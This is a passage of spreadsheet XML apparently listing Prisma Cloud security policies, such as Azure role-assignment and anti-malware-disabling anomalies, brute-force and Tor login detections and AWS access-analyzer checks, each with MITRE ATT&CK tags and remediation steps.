        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" t="inlineStr"/>
      <c r="B1551" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1551" s="2" t="inlineStr"/>
      <c r="D1551" t="inlineStr"/>
      <c r="E1551" t="inlineStr"/>
      <c r="F1551" t="inlineStr"/>
      <c r="G1551" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1551" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1551" t="inlineStr">
        <is>
          <t>Azure Compute workload assigning roles to resources</t>
        </is>
      </c>
      <c r="L1551" t="inlineStr">
        <is>
          <t>COMMAND_AND_CONTROL</t>
        </is>
      </c>
      <c r="M1551" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1551" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1551" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1551" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1551" t="inlineStr"/>
      <c r="R1551" t="inlineStr"/>
      <c r="S1551" t="inlineStr">
        <is>
          <t>Privilege Escalation</t>
        </is>
      </c>
      <c r="T1551" t="b">
        <v>0</v>
      </c>
      <c r="U1551" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1551" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1551" t="inlineStr">
        <is>
          <t>Detects an Azure Compute workload assigning a role to a resource, resource group or subscription. Azure provides mechanisms to define and assign roles to control elevated permissions. Adversaries may circumvent these mechanisms to gain higher-level permissions.</t>
        </is>
      </c>
      <c r="X1551"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51" t="inlineStr"/>
      <c r="Z1551" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1551" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1551" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:06</t>
        </is>
      </c>
      <c r="AC1551" t="inlineStr"/>
      <c r="AD1551" t="b">
        <v>1</v>
      </c>
      <c r="AE1551" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1551" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>79c81276-aaf0-4f62-a2fd-3863f2a16cd5</t>
        </is>
      </c>
      <c r="AI1551" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1551" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1551" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" t="inlineStr"/>
      <c r="B1552" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1552" s="2" t="inlineStr"/>
      <c r="D1552" t="inlineStr"/>
      <c r="E1552" t="inlineStr"/>
      <c r="F1552" t="inlineStr"/>
      <c r="G1552" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1552" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1552" t="inlineStr">
        <is>
          <t>Azure Compute workload disabling anti-malware extensions</t>
        </is>
      </c>
      <c r="L1552" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1552" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1552" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1552" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1552" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1552" t="inlineStr"/>
      <c r="R1552" t="inlineStr"/>
      <c r="S1552" t="inlineStr">
        <is>
          <t>Defense Evasion</t>
        </is>
      </c>
      <c r="T1552" t="b">
        <v>0</v>
      </c>
      <c r="U1552" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1552" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1552" t="inlineStr">
        <is>
          <t>Detects an Azure Compute workload disabling anti-malware extensions. Antimalware for Azure is a protection capability that helps identify and remove viruses, spyware, and other malicious software. Attackers often attempt to disable these extensions inorder to deploy malware.</t>
        </is>
      </c>
      <c r="X1552" t="inlineStr">
        <is>
          <t>1) The Azure compute workload in the alert is likely compromised. Isolate or delete the resource.
2) Verify your workload is not running a vulnerable service that would allow an attacker to compromise the instance and run processes on it.
3) Review the instance logs to identify possible connections made to other hosts in your cloud environment, as the instance might have been used to infect other hosts.
4) Consider using more strict access rules to limit connections from the Internet to your instances.</t>
        </is>
      </c>
      <c r="Y1552" t="inlineStr"/>
      <c r="Z1552" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1552" t="inlineStr">
        <is>
          <t>Vitaliy Stoyko</t>
        </is>
      </c>
      <c r="AB1552" t="inlineStr">
        <is>
          <t>2024-04-23 18:15:24</t>
        </is>
      </c>
      <c r="AC1552" t="inlineStr"/>
      <c r="AD1552" t="b">
        <v>1</v>
      </c>
      <c r="AE1552" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1552" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>79c81276-f3c2-4a86-a94f-54e7fb7ccebe</t>
        </is>
      </c>
      <c r="AI1552" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1552" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1552" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" t="inlineStr"/>
      <c r="B1553" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1553" s="2" t="inlineStr"/>
      <c r="D1553" t="inlineStr"/>
      <c r="E1553" t="inlineStr"/>
      <c r="F1553" t="inlineStr"/>
      <c r="G1553" t="b">
        <v>0</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1553" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1553" t="inlineStr">
        <is>
          <t>Azure user executing remote commands on virtual machines</t>
        </is>
      </c>
      <c r="L1553" t="inlineStr">
        <is>
          <t>LATERAL_MOVEMENT</t>
        </is>
      </c>
      <c r="M1553" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1553" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1553" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1553" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1553" t="inlineStr"/>
      <c r="R1553" t="inlineStr"/>
      <c r="S1553" t="inlineStr">
        <is>
          <t>Lateral Movement</t>
        </is>
      </c>
      <c r="T1553" t="b">
        <v>0</v>
      </c>
      <c r="U1553" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1553" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1553" t="inlineStr">
        <is>
          <t>Detects an Azure user executing commands remotely on a virtual machine.</t>
        </is>
      </c>
      <c r="X1553" t="inlineStr">
        <is>
          <t>1. Leverage Prisma Cloud user behavior analytics visualization on the Prisma Cloud platform to understand all the details related to this alert.
2. If it is determined through further investigation that the activity originated from a malicious insider or outsider, disable the user account until further investigation is done.</t>
        </is>
      </c>
      <c r="Y1553" t="inlineStr"/>
      <c r="Z1553" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1553" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1553" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:46</t>
        </is>
      </c>
      <c r="AC1553" t="inlineStr"/>
      <c r="AD1553" t="b">
        <v>1</v>
      </c>
      <c r="AE1553" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1553" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>79c81276-74c4-4575-ba02-33c3d37f5cf7</t>
        </is>
      </c>
      <c r="AI1553" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1553" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1553" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B1554" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1554" s="2" t="inlineStr"/>
      <c r="D1554" t="inlineStr"/>
      <c r="E1554" t="inlineStr"/>
      <c r="F1554" t="inlineStr"/>
      <c r="G1554" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1554" t="inlineStr">
        <is>
          <t>brute_force_anomaly</t>
        </is>
      </c>
      <c r="K1554" t="inlineStr">
        <is>
          <t>Excessive login failures</t>
        </is>
      </c>
      <c r="L1554" t="inlineStr">
        <is>
          <t>CREDENTIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1554" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1554" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1554" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1554" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1554" t="inlineStr">
        <is>
          <t>TA0006</t>
        </is>
      </c>
      <c r="R1554" t="inlineStr">
        <is>
          <t>T1110.001 - Brute Force: Password Guessing (TA0006)</t>
        </is>
      </c>
      <c r="S1554" t="inlineStr">
        <is>
          <t>Attack Path Rule,Credential Access,Unauthorized Access</t>
        </is>
      </c>
      <c r="T1554" t="b">
        <v>0</v>
      </c>
      <c r="U1554" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1554" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1554" t="inlineStr">
        <is>
          <t>Detects potential account hijacking attempts by identifying brute force login attempts from the management console or command line. This policy uses write events.</t>
        </is>
      </c>
      <c r="X1554" t="inlineStr">
        <is>
          <t>1. Make sure that the enterprise user indeed made attempts to login to cloud account.
          2. If the login failures did not originate from an authorized enterprise user, make sure there is strong password policy in place, including MFA, so that an unauthorized user cannot brute force their way into accessing your account.</t>
        </is>
      </c>
      <c r="Y1554" t="inlineStr"/>
      <c r="Z1554" t="inlineStr">
        <is>
          <t>brute_force_anomaly</t>
        </is>
      </c>
      <c r="AA1554" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1554" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1554" t="inlineStr"/>
      <c r="AD1554" t="b">
        <v>1</v>
      </c>
      <c r="AE1554" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1554" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>e12e210c-3018-11e7-93ae-92361f002671</t>
        </is>
      </c>
      <c r="AI1554" t="inlineStr">
        <is>
          <t>brute_force_anomaly</t>
        </is>
      </c>
      <c r="AJ1554" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1554" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, Matt's ATT&amp;ACK</t>
        </is>
      </c>
      <c r="B1555" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1555" s="2" t="inlineStr"/>
      <c r="D1555" t="inlineStr"/>
      <c r="E1555" t="inlineStr"/>
      <c r="F1555" t="inlineStr"/>
      <c r="G1555" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1555" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1555" t="inlineStr">
        <is>
          <t>Suspicious login activity</t>
        </is>
      </c>
      <c r="L1555" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1555" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1555" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1555" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1555" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1555" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1555" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1555" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact</t>
        </is>
      </c>
      <c r="T1555" t="b">
        <v>0</v>
      </c>
      <c r="U1555" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1555" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1555" t="inlineStr">
        <is>
          <t>Detects suspicious login activity originating from TOR anonymity network that could lead to potentially malicious activities from the user. This policy uses specific write events.</t>
        </is>
      </c>
      <c r="X1555" t="inlineStr">
        <is>
          <t>1. Consider blocking both inbound and outbound network traffic (both malicious and legitimate) from known Tor exit nodes to prevent reaching the organization's hosts and attacks such as data exfiltration and remote access trojans. Set rules in network devices (e.g. firewalls, proxies, security groups) to block the traffic.
2. Review the credentials (access or secret keys) used in the incident to perform sensitive operations. Determine if the credentials were unintentionally exposed, for example in a code repository or cloud storage space, and restrict access to those resources.
3. If the credentials were stolen, revoke the permissions and block the user immediately.  Scan the cloud resources accessed with the stolen credentials, for malware presence. Backdoors might have been planted to maintain access to your cloud environment.
4. Review your logs to determine the first time these credentials were used in the cloud environment and the different resources accessed and activities performed, as this will also help determine the scope of the incident.</t>
        </is>
      </c>
      <c r="Y1555" t="inlineStr"/>
      <c r="Z1555" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1555" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1555" t="inlineStr">
        <is>
          <t>2022-04-14 04:45:16</t>
        </is>
      </c>
      <c r="AC1555" t="inlineStr"/>
      <c r="AD1555" t="b">
        <v>1</v>
      </c>
      <c r="AE1555" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1555" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>626e6e17-87e5-4c38-8236-9d4f5d8f19f4</t>
        </is>
      </c>
      <c r="AI1555" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1555" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1555" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B1556" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1556" s="2" t="inlineStr"/>
      <c r="D1556" t="inlineStr"/>
      <c r="E1556" t="inlineStr"/>
      <c r="F1556" t="inlineStr"/>
      <c r="G1556" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1556" t="inlineStr">
        <is>
          <t>login_anomaly</t>
        </is>
      </c>
      <c r="K1556" t="inlineStr">
        <is>
          <t>Account hijacking attempts</t>
        </is>
      </c>
      <c r="L1556" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1556" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1556" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1556" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1556" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1556" t="inlineStr">
        <is>
          <t>TA0006</t>
        </is>
      </c>
      <c r="R1556" t="inlineStr">
        <is>
          <t>T1110.001 - Brute Force: Password Guessing (TA0006)</t>
        </is>
      </c>
      <c r="S1556" t="inlineStr">
        <is>
          <t>Credential Access,Unauthorized Access</t>
        </is>
      </c>
      <c r="T1556" t="b">
        <v>0</v>
      </c>
      <c r="U1556" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1556" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1556" t="inlineStr">
        <is>
          <t>Detects potential account hijacking attempts by identifying unusual login activities involving (i) consecutive successful login attempts made in a short duration from two different distant geo-locations or (ii) login from a previously unknown browser and/or unknown OS. This policy uses write events.</t>
        </is>
      </c>
      <c r="X1556" t="inlineStr">
        <is>
          <t>1. Make sure that the account credentials were not reused from different locations.
2. Occasionally, impossible time travel anomalies are incorrectly identified if the login attempts were made over VPN.  Please provide VPN addresses to the Prisma Cloud admin if that happens to be the case.
3. If this is indeed an account hijacking attempt, disable the user account temporarily or ask the user to change the password.</t>
        </is>
      </c>
      <c r="Y1556" t="inlineStr"/>
      <c r="Z1556" t="inlineStr">
        <is>
          <t>login_anomaly</t>
        </is>
      </c>
      <c r="AA1556" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1556" t="inlineStr">
        <is>
          <t>2022-02-17 06:10:55</t>
        </is>
      </c>
      <c r="AC1556" t="inlineStr"/>
      <c r="AD1556" t="b">
        <v>1</v>
      </c>
      <c r="AE1556" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1556" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>e12e1b44-3018-11e7-93ae-92361f002671</t>
        </is>
      </c>
      <c r="AI1556" t="inlineStr">
        <is>
          <t>login_anomaly</t>
        </is>
      </c>
      <c r="AJ1556" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1556" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B1557" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1557" s="2" t="inlineStr"/>
      <c r="D1557" t="inlineStr"/>
      <c r="E1557" t="inlineStr"/>
      <c r="F1557" t="inlineStr"/>
      <c r="G1557" t="b">
        <v>1</v>
      </c>
      <c r="H15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57" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1557" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="K1557" t="inlineStr">
        <is>
          <t>ALL Azure Subscription Created</t>
        </is>
      </c>
      <c r="L1557" t="inlineStr"/>
      <c r="M1557" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1557" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1557" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P1557" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q1557" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R1557" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S1557" t="inlineStr">
        <is>
          <t>AW_ALL_AM-4,Custom,Azure_Security_Benchmark_(v2)</t>
        </is>
      </c>
      <c r="T1557" t="b">
        <v>0</v>
      </c>
      <c r="U1557" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V1557" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="W1557" t="inlineStr"/>
      <c r="X1557" t="inlineStr"/>
      <c r="Y1557" t="inlineStr"/>
      <c r="Z1557" t="inlineStr"/>
      <c r="AA1557" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1557" t="inlineStr">
        <is>
          <t>2024-11-13 18:33:16</t>
        </is>
      </c>
      <c r="AC1557" t="inlineStr"/>
      <c r="AD1557" t="b">
        <v>0</v>
      </c>
      <c r="AE1557" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1557" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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57" t="inlineStr">
        <is>
          <t>00c8daff-092a-4dfc-bf70-075e800c51f3</t>
        </is>
      </c>
      <c r="AI1557" t="inlineStr"/>
      <c r="AJ1557" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1557" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" t="inlineStr"/>
      <c r="B1558" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1558" s="2" t="inlineStr"/>
      <c r="D1558" t="inlineStr"/>
      <c r="E1558" t="inlineStr"/>
      <c r="F1558" t="inlineStr"/>
      <c r="G1558" t="b">
        <v>0</v>
      </c>
      <c r="H15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58" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1558" t="inlineStr">
        <is>
          <t>aws-access</t>
        </is>
      </c>
      <c r="K1558" t="inlineStr">
        <is>
          <t>TEST AGAIN NEW POLICY</t>
        </is>
      </c>
      <c r="L1558" t="inlineStr"/>
      <c r="M1558" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1558" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1558" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1558" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1558" t="inlineStr"/>
      <c r="R1558" t="inlineStr"/>
      <c r="S1558" t="inlineStr">
        <is>
          <t>YES</t>
        </is>
      </c>
      <c r="T1558" t="b">
        <v>0</v>
      </c>
      <c r="U1558" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1558" t="inlineStr">
        <is>
          <t>aws-access-analyzer</t>
        </is>
      </c>
      <c r="W1558" t="inlineStr"/>
      <c r="X1558" t="inlineStr"/>
      <c r="Y1558" t="inlineStr"/>
      <c r="Z1558" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-access-analyzer' AND json.rule = createdAt does not contain 42</t>
        </is>
      </c>
      <c r="AA1558" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1558" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1558" t="inlineStr"/>
      <c r="AD1558" t="b">
        <v>0</v>
      </c>
      <c r="AE1558" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1558" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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58" t="inlineStr">
        <is>
          <t>7f46513f-2602-4d52-92ed-e1ed48e36e56</t>
        </is>
      </c>
      <c r="AI1558" t="inlineStr">
        <is>
          <t>2f5d2290-0475-42ea-a5b4-e7504ce7440f</t>
        </is>
      </c>
      <c r="AJ1558" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1558" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, CIS v3.0.0 (AWS) Level 1, CIS v1.3.0 (AWS), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO 27002:2022, CIS v2.0.0 (AWS) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.5.0 (AWS) - Level 1, HITRUST CSF v.11.2.0, ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, Copy of HIPAA, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, PCI DSS v4.0, Zoom -  CIS v1.5.0 (AWS) , CIS Controls v8, MLPS 2.0 (Level 2), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, NIST CSF v2.0, HIPAA, ISO 27002:2022, HITRUST CSF v.9.6.0, PCI DSS v4.0, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CIS v1.4.0 (AWS), PCI DSS v4.0, HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B1559" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1559" s="2" t="inlineStr"/>
      <c r="D1559" t="inlineStr"/>
      <c r="E1559" t="inlineStr"/>
      <c r="F1559" t="inlineStr"/>
      <c r="G1559" t="b">
        <v>1</v>
      </c>
      <c r="H15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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1559" t="inlineStr">
        <is>
          <t>aws-access</t>
        </is>
      </c>
      <c r="K1559" t="inlineStr">
        <is>
          <t>Tag kashan AWS IAM Access analyzer is not configured</t>
        </is>
      </c>
      <c r="L1559" t="inlineStr"/>
      <c r="M1559" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1559" t="inlineStr">
